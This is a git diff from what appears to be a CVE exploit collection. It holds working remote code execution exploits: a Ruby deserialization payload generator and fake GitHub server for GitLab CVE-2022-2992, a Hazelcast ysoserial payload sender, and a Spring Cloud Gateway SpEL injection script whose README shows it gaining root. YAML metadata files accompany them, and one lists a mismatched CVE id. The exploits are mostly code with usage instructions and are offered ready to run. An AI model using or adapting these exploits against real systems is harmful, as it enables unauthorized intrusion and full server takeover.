a/cve/gitlab/2022/CVE-2022-2992/payload_gen.rb +++ b/cve/gitlab/2022/CVE-2022-2992/payload_gen.rb @@ -1,49 +1,49 @@ -require 'redis' -require 'json' -# NOTE: Made by vakzz I only made some minor changes - - -if ARGV.length < 1 - puts "[!] Please pass command argument" - puts 'Example: ruby payload.rb "whoami > /tmp/test"' - exit -end - -# Autoload the required classes -Gem::SpecFetcher -Gem::Installer - -# prevent the payload from running when we Marshal.dump it -module Gem - class Requirement - def marshal_dump - [@requirements] - end - end -end - -wa1 = Net::WriteAdapter.new(Kernel, :system) - -rs = Gem::RequestSet.allocate -rs.instance_variable_set('@sets', wa1) -rs.instance_variable_set('@git_set', "#{ARGV[0]}") - -wa2 = Net::WriteAdapter.new(rs, :resolve) - -i = Gem::Package::TarReader::Entry.allocate -i.instance_variable_set('@read', 0) -i.instance_variable_set('@header', 'aaa') - -n = Net::BufferedIO.allocate -n.instance_variable_set('@io', i) -n.instance_variable_set('@debug_output', wa2) - -t = Gem::Package::TarReader.allocate -t.instance_variable_set('@io', n) - -r = Gem::Requirement.allocate -r.instance_variable_set('@requirements', t) - -payload = Marshal.dump([Gem::SpecFetcher, Gem::Installer, r]) -a = "ggg\r\n*3\r\n$3\r\nset\r\n$19\r\nsession:gitlab:gggg\r\n$"+((payload.length).to_s)+"\r\n"+payload -puts a.to_json +require 'redis' +require 'json' +# NOTE: Made by vakzz I only made some minor changes + + +if ARGV.length < 1 + puts "[!] Please pass command argument" + puts 'Example: ruby payload.rb "whoami > /tmp/test"' + exit +end + +# Autoload the required classes +Gem::SpecFetcher +Gem::Installer + +# prevent the payload from running when we Marshal.dump it +module Gem + class Requirement + def marshal_dump + [@requirements] + end + end +end + +wa1 = Net::WriteAdapter.new(Kernel, :system) + +rs = Gem::RequestSet.allocate +rs.instance_variable_set('@sets', wa1) +rs.instance_variable_set('@git_set', "#{ARGV[0]}") + +wa2 = Net::WriteAdapter.new(rs, :resolve) + +i = Gem::Package::TarReader::Entry.allocate +i.instance_variable_set('@read', 0) +i.instance_variable_set('@header', 'aaa') + +n = Net::BufferedIO.allocate +n.instance_variable_set('@io', i) +n.instance_variable_set('@debug_output', wa2) + +t = Gem::Package::TarReader.allocate +t.instance_variable_set('@io', n) + +r = Gem::Requirement.allocate +r.instance_variable_set('@requirements', t) + +payload = Marshal.dump([Gem::SpecFetcher, Gem::Installer, r]) +a = "ggg\r\n*3\r\n$3\r\nset\r\n$19\r\nsession:gitlab:gggg\r\n$"+((payload.length).to_s)+"\r\n"+payload +puts a.to_json diff --git a/cve/gitlab/2022/CVE-2022-2992/server.py b/cve/gitlab/2022/CVE-2022-2992/server.py index 7e8db2e5e2de854fe28165015331d65628d30e5d..9e871bf7746231d4c3b5efe4d5e6caa8ba427e2e 100644 --- a/cve/gitlab/2022/CVE-2022-2992/server.py +++ b/cve/gitlab/2022/CVE-2022-2992/server.py @@ -1,92 +1,92 @@ -from flask import Flask, request, Response, send_file, jsonify -import requests -import json -# Made by vakzz -HTTP_METHODS = [ - "GET", - "HEAD", - "POST", - "PUT", - "DELETE", - "CONNECT", - "OPTIONS", - "TRACE", - "PATCH", -] -app = Flask(__name__) - -# NOTE: Update these 2 variables -PAYLOAD = '' -NGROK_URL = '' - - -REPO_JSON = { - "id": 12345, - "name": "fake", - "full_name": "fake/name", - "clone_url": NGROK_URL + "/vakzz/public.git", -} - - -@app.route("/vakzz/public.git/info/refs") -def git_refs(): - return ( - b"001e# service=git-upload-pack\n00000154b5e17b851383bcee012364d0df7b67a3c4797b73 HEAD\x00multi_ack thin-pack side-band side-band-64k ofs-delta shallow deepen-since deepen-not deepen-relative no-progress include-tag multi_ack_detailed allow-tip-sha1-in-want allow-reachable-sha1-in-want no-done symref=HEAD:refs/heads/main filter object-format=sha1 agent=git/github-g04ce7e352669\n003db5e17b851383bcee012364d0df7b67a3c4797b73 refs/heads/main\n0000", - 200, - {"Content-Type": "application/x-git-upload-pack-advertisement"}, - ) - - -@app.route("/vakzz/public.git/git-upload-pack", methods=["POST"]) -def git_pack(): - return ( - b'0008NAK\n0023\x02Enumerating objects: 3, done.\n0022\x02Counting objects: 33% (1/3)\r0022\x02Counting objects: 66% (2/3)\r0022\x02Counting objects: 100% (3/3)\r0029\x02Counting objects: 100% (3/3), done.\n0265\x01PACK\x00\x00\x00\x02\x00\x00\x00\x03\x9a(x\x9cmR\xcbn\xa3@\x00\xbb\xf3\x15sG\xdb0\xbc\x91\xdaUg(\x05\xb6\xc9\x00i\x08io<\xc20\x84Gx\x87|\xfdv\xb7\xd7\xfaf\xcb\x96,\xd9c\x7f>\x83L\xceu\xa8\xa5\x9a\x90\xe6\xb9\x9e\xe7R\x92&r\x96f\x86b\x18\x8a.\xe6\xb1\n\xb3\x14\x8a9\xe4\xe2i,\xda\x1eD\xac\xaaX\\\x03\xdc.\x15k(x\\\xbe\x84\xe7%\xf9\xa6\x0f\xac\xc9\xdb\xdf\x00\xaa*\x94d(+*\xe0\xa1 \x08\\\xda\xd65\x1b\xc7s\x0fl6:S\x02\x1e\x9b\xb6?_\xab\xf5\x99\xb2\xb1\x98\x92\x87/\xc3\x0f1z\xa5\x03\xa3\xe0\xd7?`\xcbv\t\xf0m\x1f\xbc\xbb6A\x87po\xfd\xd79\xc0\x81e\xc0)F\x08\x9b\x08\x058\xf8Sb\xaa\x07\xe6\x1e\xbfiE){\xb3\xd4\xbb\x0bB3\r\\\xe4t\xcb\x1b\xcd\xd96W\xeac\xfe\x11\xdb\x05\x9f\xbdB\xbe\xe3\x80"\xd2H\x8f\x8e\xcc\xa4:\xf9\xdct\xc3\x88Y\xa8_.\xa7tht\xb5B\xa8\x13\x96\n\x1f\xe4jt\xe1\xea\xf9\x1f\xbcVf7\x85\x85\xe3\xb1\xd9\x96\xedHt\x0e\xd8\xd7y\x8b\xe4\xcfY\xd4\x93\xbb\xb8\xf9\x14=\xff\x10D)\x8e\x87Lz\xado\xeb2m2\xe8\xf4W\x8a\x02\xc2\xf6u\x946\xcb\xf5\xd4C\xcb\xb6\xadN%\xd3]\xe5@:%\x1a\x81\xea\xbe\xc6\xd4\x98\x1a\xf1\x8f\xb4+w\x06,nf\xca*\x1a\x94+\xf3\xa2\xb5U\xc5\xa3\x7f\xaaH\x1b_\xc2;<\x1en\x1bB\x19\xcd\xb2\xc5\xe0\'\x0e\x08\xda\x18#\'\xf7/\xba\xb5\xa7\x86\xe0\xf1\xb50k\xc7\x9btK\xca\xb3I\x82\xa2\x08\xe7]%\r}7\xedb=\x0cO\xd8\x94}{%\xfd\xee\xfdP\xdd\xed\xac\xfe\xea\x80\xcd\x8b\xcb\xb7y\xbd\xf3\xb2\xaaQ\xd8@\xf8\xed\xac+\x92_F\xd2^v\x9c\xd4\x14\xca"\xac?\xae\x9b;I\xf9\xd5|K$\xcd\xec^\xc6\xc0\tm\xabFO\x1cx\xf2\x02\xe9\x95\xfb\xde\xcc"/?/\xc6\xb9\r\x1bY\\\x81\xefc\xfc\x05\xc7\xd4\xcb\x13\xa5\x02x\x9c340031Q\x08rut\xf1u\xd5\xcbMa8\x96\x983g{\xab\xdfn\x86\xe6\xe7\xc2\xd9fo\x9f~\x7f\x94\xe5\x04\x00\xe1!\x0e\xe6=x\x9cSV((M\xca\xc9L\xe6JLL\xe4\x02\x00\x1c^\x03\xfa\xd2_\xcc\xa1\xa6\x81\xa3\xb6\xeeSL\x96\t\x0c\xb4\xf8\xb7>\xa90006\x01\xf8003a\x02Total 3 (delta 0), reused 0 (delta 0), pack-reused 0\n0000', - 200, - {"Content-Type": "application/x-git-upload-pack-result"}, - ) - - -@app.before_request -def log_request(): - app.logger.debug("Request Path %s", request.path) - app.logger.debug("Request Data %s", request.data) - return None - - -@app.route("/repositories/12345") -def repo(): - return jsonify(REPO_JSON) - - -@app.route("/api/v3/repositories/12345") -def repo_legacy(): - return jsonify(REPO_JSON) - - -@app.route("/api/v3/repos/fake/name") -def repo_info(): - return jsonify( - { - "default_branch": { - "to_s": { - "to_s": PAYLOAD, - "bytesize": 3, - } - } - } - ) - - -@app.route("/api/v3/rate_limit") -def rate_limit(): - return ( - jsonify({}), - 200, - {"X-RateLimit-Limit": "100000", "X-RateLimit-Remaining": "100000"}, - ) - - -@app.route("/", defaults={"path": ""}, methods=HTTP_METHODS) -@app.route("/", methods=HTTP_METHODS) -def proxy(path): - return jsonify({}) +from flask import Flask, request, Response, send_file, jsonify +import requests +import json +# Made by vakzz +HTTP_METHODS = [ + "GET", + "HEAD", + "POST", + "PUT", + "DELETE", + "CONNECT", + "OPTIONS", + "TRACE", + "PATCH", +] +app = Flask(__name__) + +# NOTE: Update these 2 variables +PAYLOAD = '' +NGROK_URL = '' + + +REPO_JSON = { + "id": 12345, + "name": "fake", + "full_name": "fake/name", + "clone_url": NGROK_URL + "/vakzz/public.git", +} + + +@app.route("/vakzz/public.git/info/refs") +def git_refs(): + return ( + b"001e# service=git-upload-pack\n00000154b5e17b851383bcee012364d0df7b67a3c4797b73 HEAD\x00multi_ack thin-pack side-band side-band-64k ofs-delta shallow deepen-since deepen-not deepen-relative no-progress include-tag multi_ack_detailed allow-tip-sha1-in-want allow-reachable-sha1-in-want no-done symref=HEAD:refs/heads/main filter object-format=sha1 agent=git/github-g04ce7e352669\n003db5e17b851383bcee012364d0df7b67a3c4797b73 refs/heads/main\n0000", + 200, + {"Content-Type": "application/x-git-upload-pack-advertisement"}, + ) + + +@app.route("/vakzz/public.git/git-upload-pack", methods=["POST"]) +def git_pack(): + return ( + b'0008NAK\n0023\x02Enumerating objects: 3, done.\n0022\x02Counting objects: 33% (1/3)\r0022\x02Counting objects: 66% (2/3)\r0022\x02Counting objects: 100% (3/3)\r0029\x02Counting objects: 100% (3/3), done.\n0265\x01PACK\x00\x00\x00\x02\x00\x00\x00\x03\x9a(x\x9cmR\xcbn\xa3@\x00\xbb\xf3\x15sG\xdb0\xbc\x91\xdaUg(\x05\xb6\xc9\x00i\x08io<\xc20\x84Gx\x87|\xfdv\xb7\xd7\xfaf\xcb\x96,\xd9c\x7f>\x83L\xceu\xa8\xa5\x9a\x90\xe6\xb9\x9e\xe7R\x92&r\x96f\x86b\x18\x8a.\xe6\xb1\n\xb3\x14\x8a9\xe4\xe2i,\xda\x1eD\xac\xaaX\\\x03\xdc.\x15k(x\\\xbe\x84\xe7%\xf9\xa6\x0f\xac\xc9\xdb\xdf\x00\xaa*\x94d(+*\xe0\xa1 \x08\\\xda\xd65\x1b\xc7s\x0fl6:S\x02\x1e\x9b\xb6?_\xab\xf5\x99\xb2\xb1\x98\x92\x87/\xc3\x0f1z\xa5\x03\xa3\xe0\xd7?`\xcbv\t\xf0m\x1f\xbc\xbb6A\x87po\xfd\xd79\xc0\x81e\xc0)F\x08\x9b\x08\x058\xf8Sb\xaa\x07\xe6\x1e\xbfiE){\xb3\xd4\xbb\x0bB3\r\\\xe4t\xcb\x1b\xcd\xd96W\xeac\xfe\x11\xdb\x05\x9f\xbdB\xbe\xe3\x80"\xd2H\x8f\x8e\xcc\xa4:\xf9\xdct\xc3\x88Y\xa8_.\xa7tht\xb5B\xa8\x13\x96\n\x1f\xe4jt\xe1\xea\xf9\x1f\xbcVf7\x85\x85\xe3\xb1\xd9\x96\xedHt\x0e\xd8\xd7y\x8b\xe4\xcfY\xd4\x93\xbb\xb8\xf9\x14=\xff\x10D)\x8e\x87Lz\xado\xeb2m2\xe8\xf4W\x8a\x02\xc2\xf6u\x946\xcb\xf5\xd4C\xcb\xb6\xadN%\xd3]\xe5@:%\x1a\x81\xea\xbe\xc6\xd4\x98\x1a\xf1\x8f\xb4+w\x06,nf\xca*\x1a\x94+\xf3\xa2\xb5U\xc5\xa3\x7f\xaaH\x1b_\xc2;<\x1en\x1bB\x19\xcd\xb2\xc5\xe0\'\x0e\x08\xda\x18#\'\xf7/\xba\xb5\xa7\x86\xe0\xf1\xb50k\xc7\x9btK\xca\xb3I\x82\xa2\x08\xe7]%\r}7\xedb=\x0cO\xd8\x94}{%\xfd\xee\xfdP\xdd\xed\xac\xfe\xea\x80\xcd\x8b\xcb\xb7y\xbd\xf3\xb2\xaaQ\xd8@\xf8\xed\xac+\x92_F\xd2^v\x9c\xd4\x14\xca"\xac?\xae\x9b;I\xf9\xd5|K$\xcd\xec^\xc6\xc0\tm\xabFO\x1cx\xf2\x02\xe9\x95\xfb\xde\xcc"/?/\xc6\xb9\r\x1bY\\\x81\xefc\xfc\x05\xc7\xd4\xcb\x13\xa5\x02x\x9c340031Q\x08rut\xf1u\xd5\xcbMa8\x96\x983g{\xab\xdfn\x86\xe6\xe7\xc2\xd9fo\x9f~\x7f\x94\xe5\x04\x00\xe1!\x0e\xe6=x\x9cSV((M\xca\xc9L\xe6JLL\xe4\x02\x00\x1c^\x03\xfa\xd2_\xcc\xa1\xa6\x81\xa3\xb6\xeeSL\x96\t\x0c\xb4\xf8\xb7>\xa90006\x01\xf8003a\x02Total 3 (delta 0), reused 0 (delta 0), pack-reused 0\n0000', + 200, + {"Content-Type": "application/x-git-upload-pack-result"}, + ) + + +@app.before_request +def log_request(): + app.logger.debug("Request Path %s", request.path) + app.logger.debug("Request Data %s", request.data) + return None + + +@app.route("/repositories/12345") +def repo(): + return jsonify(REPO_JSON) + + +@app.route("/api/v3/repositories/12345") +def repo_legacy(): + return jsonify(REPO_JSON) + + +@app.route("/api/v3/repos/fake/name") +def repo_info(): + return jsonify( + { + "default_branch": { + "to_s": { + "to_s": PAYLOAD, + "bytesize": 3, + } + } + } + ) + + +@app.route("/api/v3/rate_limit") +def rate_limit(): + return ( + jsonify({}), + 200, + {"X-RateLimit-Limit": "100000", "X-RateLimit-Remaining": "100000"}, + ) + + +@app.route("/", defaults={"path": ""}, methods=HTTP_METHODS) +@app.route("/", methods=HTTP_METHODS) +def proxy(path): + return jsonify({}) diff --git a/cve/gitlab/2022/yaml/CVE-2022-2992.yaml b/cve/gitlab/2022/yaml/CVE-2022-2992.yaml index 4600a13bce10d5ee262ac330f8edcd72b4be97dc..531d568c08132d5411f3ebcc0f04c6a0f06d5382 100644 --- a/cve/gitlab/2022/yaml/CVE-2022-2992.yaml +++ b/cve/gitlab/2022/yaml/CVE-2022-2992.yaml @@ -1,27 +1,27 @@ -id: CVE-2022-2992 -source: https://github.com/CsEnox/CVE-2022-2992 -info: - name: GitLab是由GitLab Inc.开发,一款基于Git的完全集成的软件开发平台。 - severity: critical - description: | - A vulnerability in GitLab CE/EE affecting all versions from 11.10 prior to 15.1.6, 15.2 to 15.2.4, 15.3 to 15.3.2 allows an authenticated user to achieve remote code execution via the Import from GitHub API endpoint. - scope-of-influence: - 11.10 <= GitLab(CE/EE)< 15.1.6 - 15.2 <= GitLab(CE/EE)< 15.2.4 - 15.3 <= GitLab(CE/EE)< 15.3.2 - reference: - - https://gitlab.com/gitlab-org/cves/-/blob/master/2022/CVE-2022-2992.json - - https://gitlab.com/gitlab-org/cves/-/blob/master/2022/CVE-2022-2992.json - - http://packetstormsecurity.com/files/171008/GitLab-GitHub-Repo-Import-Deserialization-Remote-Code-Execution.html - - https://gitlab.com/gitlab-org/gitlab/-/issues/371884 - - https://gitlab.com/gitlab-org/gitlab/-/issues/371884 - - https://hackerone.com/reports/1679624 - - https://hackerone.com/reports/1679624 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H - cvss-score: 9.9 - cve-id: CVE-2022-2292 - cwe-id: CWE-77 - cnvd-id: None - kve-id: None +id: CVE-2022-2992 +source: https://github.com/CsEnox/CVE-2022-2992 +info: + name: GitLab是由GitLab Inc.开发,一款基于Git的完全集成的软件开发平台。 + severity: critical + description: | + A vulnerability in GitLab CE/EE affecting all versions from 11.10 prior to 15.1.6, 15.2 to 15.2.4, 15.3 to 15.3.2 allows an authenticated user to achieve remote code execution via the Import from GitHub API endpoint. + scope-of-influence: + 11.10 <= GitLab(CE/EE)< 15.1.6 + 15.2 <= GitLab(CE/EE)< 15.2.4 + 15.3 <= GitLab(CE/EE)< 15.3.2 + reference: + - https://gitlab.com/gitlab-org/cves/-/blob/master/2022/CVE-2022-2992.json + - https://gitlab.com/gitlab-org/cves/-/blob/master/2022/CVE-2022-2992.json + - http://packetstormsecurity.com/files/171008/GitLab-GitHub-Repo-Import-Deserialization-Remote-Code-Execution.html + - https://gitlab.com/gitlab-org/gitlab/-/issues/371884 + - https://gitlab.com/gitlab-org/gitlab/-/issues/371884 + - https://hackerone.com/reports/1679624 + - https://hackerone.com/reports/1679624 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H + cvss-score: 9.9 + cve-id: CVE-2022-2292 + cwe-id: CWE-77 + cnvd-id: None + kve-id: None tags: cve2022, gitlab \ No newline at end of file diff --git a/cve/hazelcast/2022/CVE-2022-0265/CVE-2022-0265.py b/cve/hazelcast/2022/CVE-2022-0265/CVE-2022-0265.py index a7fac033e38e130e889d4d9a5b84a4e5653a29ed..856961aa81b2a20c246f51467e21fd65a6cf2dcc 100644 --- a/cve/hazelcast/2022/CVE-2022-0265/CVE-2022-0265.py +++ b/cve/hazelcast/2022/CVE-2022-0265/CVE-2022-0265.py @@ -1,32 +1,32 @@ -import socket -import threading -import time -import sys -import os -groupName = b"" -clientSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) -def socketRecv(clientSocket): - global groupName - while(1): - groupName += clientSocket.recv(1024) -if __name__ == '__main__': - - ip = sys.argv[1] - payloadType = sys.argv[2] - payload = sys.argv[3] - - os.system(f"java -jar ysoserial.jar {payloadType} {payload} > 1.ser") - print(f"java -jar ysoserial.jar {payloadType} {payload} > 1.ser") - clientSocket.connect((ip, 5701)) - obj1 = threading.Thread(target=socketRecv ,args=(clientSocket,)) - obj1.start() - file = open("1.ser", 'rb') - filebyte = file.read() - print(filebyte) - - print("输入 send 发送payload") - if(input("INPUT:")=="send"): - print(groupName) - clientSocket.send(groupName+b"\xFF\xFF\xFF\x9C"+filebyte) - time.sleep(10) - clientSocket.close() +import socket +import threading +import time +import sys +import os +groupName = b"" +clientSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +def socketRecv(clientSocket): + global groupName + while(1): + groupName += clientSocket.recv(1024) +if __name__ == '__main__': + + ip = sys.argv[1] + payloadType = sys.argv[2] + payload = sys.argv[3] + + os.system(f"java -jar ysoserial.jar {payloadType} {payload} > 1.ser") + print(f"java -jar ysoserial.jar {payloadType} {payload} > 1.ser") + clientSocket.connect((ip, 5701)) + obj1 = threading.Thread(target=socketRecv ,args=(clientSocket,)) + obj1.start() + file = open("1.ser", 'rb') + filebyte = file.read() + print(filebyte) + + print("输入 send 发送payload") + if(input("INPUT:")=="send"): + print(groupName) + clientSocket.send(groupName+b"\xFF\xFF\xFF\x9C"+filebyte) + time.sleep(10) + clientSocket.close() diff --git a/cve/java-spring-cloud-gateway/2022/CVE-2022-22947/README.md b/cve/java-spring-cloud-gateway/2022/CVE-2022-22947/README.md index d744b0b88862a5de15b73bbec6ba379cfa26e9ef..2276b740dde31f295f9c954ad6ad8f717640b82e 100644 --- a/cve/java-spring-cloud-gateway/2022/CVE-2022-22947/README.md +++ b/cve/java-spring-cloud-gateway/2022/CVE-2022-22947/README.md @@ -1,44 +1,44 @@ -# Spring Cloud Gateway < 3.0.7 & < 3.1.1 Code Injection (RCE) -###### CVE: CVE-2022-22947 -###### CVSS: 10.0 (Vmware - https://tanzu.vmware.com/security/cve-2022-22947) -###### Applications using Spring Cloud Gateway are vulnerable to a code injection attack when the Gateway Actuator endpoint is enabled, exposed and unsecured. A remote attacker could make a maliciously crafted request that could allow arbitrary remote execution on the remote host. - - -#### Usage -```sh -git clone https://github.com/carlosevieira/CVE-2022-22947 -cd CVE-2022-22947 -pip3 install -r requirements.txt -python3 exploit.py http://target 'id' -``` - -```sh -john@doe:~/exploit/CVE-2022-22947/$ python3 exploit.py http://localhost:8080 'id' - - ################################################### - # # - # Exploit for CVE-2022-22947 # - # - Carlos Vieira (Crowsec) # - # # - # Usage: # - # python3 exploit.py # - # # - # Example: # - # python3 exploit.py http://localhost:8080 'id' # - # # - ################################################### - -[+] Stage deployed to /actuator/gateway/routes/rtxhovup -[+] Executing command... -[+] getting result... -[+] Stage removed! -uid=0(root) gid=0(root) groups=0(root) -``` - -#### References - -https://wya.pl/2022/02/26/cve-2022-22947-spel-casting-and-evil-beans/ - -https://spring.io/blog/2022/03/01/spring-cloud-gateway-cve-reports-published - +# Spring Cloud Gateway < 3.0.7 & < 3.1.1 Code Injection (RCE) +###### CVE: CVE-2022-22947 +###### CVSS: 10.0 (Vmware - https://tanzu.vmware.com/security/cve-2022-22947) +###### Applications using Spring Cloud Gateway are vulnerable to a code injection attack when the Gateway Actuator endpoint is enabled, exposed and unsecured. A remote attacker could make a maliciously crafted request that could allow arbitrary remote execution on the remote host. + + +#### Usage +```sh +git clone https://github.com/carlosevieira/CVE-2022-22947 +cd CVE-2022-22947 +pip3 install -r requirements.txt +python3 exploit.py http://target 'id' +``` + +```sh +john@doe:~/exploit/CVE-2022-22947/$ python3 exploit.py http://localhost:8080 'id' + + ################################################### + # # + # Exploit for CVE-2022-22947 # + # - Carlos Vieira (Crowsec) # + # # + # Usage: # + # python3 exploit.py # + # # + # Example: # + # python3 exploit.py http://localhost:8080 'id' # + # # + ################################################### + +[+] Stage deployed to /actuator/gateway/routes/rtxhovup +[+] Executing command... +[+] getting result... +[+] Stage removed! +uid=0(root) gid=0(root) groups=0(root) +``` + +#### References + +https://wya.pl/2022/02/26/cve-2022-22947-spel-casting-and-evil-beans/ + +https://spring.io/blog/2022/03/01/spring-cloud-gateway-cve-reports-published + https://tanzu.vmware.com/security/cve-2022-22947 \ No newline at end of file diff --git a/cve/java-spring-cloud-gateway/2022/CVE-2022-22947/exploit.py b/cve/java-spring-cloud-gateway/2022/CVE-2022-22947/exploit.py index 953f4759313e13774e616d2d23425caac61ba577..d7e2b150bf07e7fc4e00cf2cc95273d973fe285e 100644 --- a/cve/java-spring-cloud-gateway/2022/CVE-2022-22947/exploit.py +++ b/cve/java-spring-cloud-gateway/2022/CVE-2022-22947/exploit.py @@ -1,76 +1,76 @@ -import random -import string -import requests -import json -import sys -import urllib.parse -import base64 -import urllib3 -urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) - -headers = { "Content-Type": "application/json" , 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36','Accept' : '*/*'} - -id = ''.join(random.choice(string.ascii_lowercase) for i in range(8)) - -def exploit(url, command): - - payload = { "id": id, "filters": [{ "name": "AddResponseHeader", "args": { "name": "Result", "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(\u0022"+command+"\u0022).getInputStream()))}"}}],"uri": "http://example.com"} - - rbase = requests.post(url + '/actuator/gateway/routes/'+id, headers=headers, data=json.dumps(payload), verify=False) - if(rbase.status_code == 201): - print("[+] Stage deployed to /actuator/gateway/routes/"+id) - print("[+] Executing command...") - r = requests.post(url + '/actuator/gateway/refresh', headers=headers, verify=False) - if(r.status_code == 200): - print("[+] getting result...") - r = requests.get(url + '/actuator/gateway/routes/' + id, headers=headers, verify=False) - if(r.status_code == 200): - get_response = r.json() - clean(url, id) - return get_response['filters'][0].split("'")[1] - else: - print("[-] Error: Invalid response") - clean(url, id) - exit(1) - else: - clean(url, id) - print("[-] Error executing command") - else: - print("[X] Error: Fail to deploy stage (Patched ?)") - exit(1) - -def clean(url, id): - remove = requests.delete(url + '/actuator/gateway/routes/' + id, headers=headers, verify=False) - if(remove.status_code == 200): - print("[+] Stage removed!") - else: - print("[-] Error: Fail to remove stage") - -def banner(): - print(""" - ################################################### - # # - # Exploit for CVE-2022-22947 # - # - Carlos Vieira (Crowsec) # - # # - # Usage: # - # python3 exploit.py # - # # - # Example: # - # python3 exploit.py http://localhost:8080 'id' # - # # - ################################################### - """) - -def main(): - banner() - if len(sys.argv) != 3: - print("[-] Error: Invalid arguments") - print("[-] Usage: python3 exploit.py ") - exit(1) - else: - url = sys.argv[1] - command = sys.argv[2] - print(exploit(url, command)) -if __name__ == '__main__': +import random +import string +import requests +import json +import sys +import urllib.parse +import base64 +import urllib3 +urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) + +headers = { "Content-Type": "application/json" , 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36','Accept' : '*/*'} + +id = ''.join(random.choice(string.ascii_lowercase) for i in range(8)) + +def exploit(url, command): + + payload = { "id": id, "filters": [{ "name": "AddResponseHeader", "args": { "name": "Result", "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(\u0022"+command+"\u0022).getInputStream()))}"}}],"uri": "http://example.com"} + + rbase = requests.post(url + '/actuator/gateway/routes/'+id, headers=headers, data=json.dumps(payload), verify=False) + if(rbase.status_code == 201): + print("[+] Stage deployed to /actuator/gateway/routes/"+id) + print("[+] Executing command...") + r = requests.post(url + '/actuator/gateway/refresh', headers=headers, verify=False) + if(r.status_code == 200): + print("[+] getting result...") + r = requests.get(url + '/actuator/gateway/routes/' + id, headers=headers, verify=False) + if(r.status_code == 200): + get_response = r.json() + clean(url, id) + return get_response['filters'][0].split("'")[1] + else: + print("[-] Error: Invalid response") + clean(url, id) + exit(1) + else: + clean(url, id) + print("[-] Error executing command") + else: + print("[X] Error: Fail to deploy stage (Patched ?)") + exit(1) + +def clean(url, id): + remove = requests.delete(url + '/actuator/gateway/routes/' + id, headers=headers, verify=False) + if(remove.status_code == 200): + print("[+] Stage removed!") + else: + print("[-] Error: Fail to remove stage") + +def banner(): + print(""" + ################################################### + # # + # Exploit for CVE-2022-22947 # + # - Carlos Vieira (Crowsec) # + # # + # Usage: # + # python3 exploit.py # + # # + # Example: # + # python3 exploit.py http://localhost:8080 'id' # + # # + ################################################### + """) + +def main(): + banner() + if len(sys.argv) != 3: + print("[-] Error: Invalid arguments") + print("[-] Usage: python3 exploit.py ") + exit(1) + else: + url = sys.argv[1] + command = sys.argv[2] + print(exploit(url, command)) +if __name__ == '__main__': main() \ No newline at end of file diff --git a/cve/java-spring-cloud-gateway/2022/yaml/CVE-2022-22947.yaml b/cve/java-spring-cloud-gateway/2022/yaml/CVE-2022-22947.yaml index 21923f4393f1f89566eae5d3de2fd2a82b8b91b8..281211f29cdfaf38bb46517289e46cbc2ccead71 100644 --- a/cve/java-spring-cloud-gateway/2022/yaml/CVE-2022-22947.yaml +++ b/cve/java-spring-cloud-gateway/2022/yaml/CVE-2022-22947.yaml @@ -1,22 +1,22 @@ -id: CVE-2022-22947 -source: - https://github.com/crowsec-edtech/CVE-2022-22947 -info: - name: Spring Cloud Gateway 是 Spring Cloud 的一个全新项目,该项目是基于 Spring 5.0,Spring Boot 2.0 和 Project Reactor 等技术开发的网关,它旨在为微服务架构提供一种简单有效的统一的 API 路由管理方式。 - severity: critical - description: | - Spring Cloud Gateway存在远程代码执行漏洞,该漏洞是发生在Spring Cloud Gateway应用程序的Actuator端点,其在启用、公开和不安全的情况下容易受到代码注入的攻击。攻击者可利用该漏洞通过恶意创建允许在远程主机上执行任意远程请求。 - scope-of-influence: - Spring Cloud GateWay 3.1.0 - Spring Cloud GateWay >=3.0.0, <=3.0.6 - Spring Cloud GateWay <3.0.0 - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2022-22947 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 - cve-id: CVE-2022-22947 - cwe-id: CWE-94 - cnvd-id: None - kve-id: None +id: CVE-2022-22947 +source: + https://github.com/crowsec-edtech/CVE-2022-22947 +info: + name: Spring Cloud Gateway 是 Spring Cloud 的一个全新项目,该项目是基于 Spring 5.0,Spring Boot 2.0 和 Project Reactor 等技术开发的网关,它旨在为微服务架构提供一种简单有效的统一的 API 路由管理方式。 + severity: critical + description: | + Spring Cloud Gateway存在远程代码执行漏洞,该漏洞是发生在Spring Cloud Gateway应用程序的Actuator端点,其在启用、公开和不安全的情况下容易受到代码注入的攻击。攻击者可利用该漏洞通过恶意创建允许在远程主机上执行任意远程请求。 + scope-of-influence: + Spring Cloud GateWay 3.1.0 + Spring Cloud GateWay >=3.0.0, <=3.0.6 + Spring Cloud GateWay <3.0.0 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-22947 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cve-id: CVE-2022-22947 + cwe-id: CWE-94 + cnvd-id: None + kve-id: None tags: cve2022, spring-cloud-gateway \ No newline at end of file diff --git a/cve/java-spring-security/2022/CVE-2022-22978/.gitignore b/cve/java-spring-security/2022/CVE-2022-22978/.gitignore new file mode 100644 index 0000000000000000000000000000000000000000..589f69dd5ac54a808cd82e72381e2599726b3d6d --- /dev/null +++ b/cve/java-spring-security/2022/CVE-2022-22978/.gitignore @@ -0,0 +1,58 @@ +HELP.md +target/ +!.mvn/wrapper/maven-wrapper.jar +!**/src/main/**/target/ +!**/src/test/**/target/ + +### STS ### +.apt_generated +.classpath +.factorypath +.project +.settings +.springBeans +.sts4-cache + +### IntelliJ IDEA ### +.idea +*.iws +*.iml +*.ipr + +### NetBeans ### +/nbproject/private/ +/nbbuild/ +/dist/ +/nbdist/ +/.nb-gradle/ +build/ +!**/src/main/**/build/ +!**/src/test/**/build/ + +### VS Code ### +.vscode/ +### Java template +# Compiled 